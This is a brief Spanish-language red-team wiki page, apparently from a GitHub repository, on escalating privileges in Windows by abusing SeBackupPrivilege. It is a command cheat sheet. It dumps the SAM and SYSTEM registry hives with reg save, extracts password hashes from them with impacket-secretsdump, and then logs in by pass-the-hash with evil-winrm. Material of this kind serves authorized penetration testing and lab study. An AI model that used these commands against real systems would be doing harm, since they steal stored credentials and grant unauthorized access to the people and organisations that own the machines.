Windows ‐ Elevación de privilegios - miremarti/redteam-stuff GitHub Wiki

Aprovechando el permiso SeBackupPrivilege

Ver privilegios de mi usuario:

whoami /priv

Volcamos registro SAM y SYSTEM en un archivo de respaldo:

reg save hklm\sam <ruta destino>\sam.hive

reg save hklm\system <ruta destino>\system.hive

Descargar archivos a máquina atacante y extraemos:

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Pass-The-Hash:

evil-winrm -i <IP> -u <usuario> -H <hash>

⚠️ **GitHub.com Fallback** ⚠️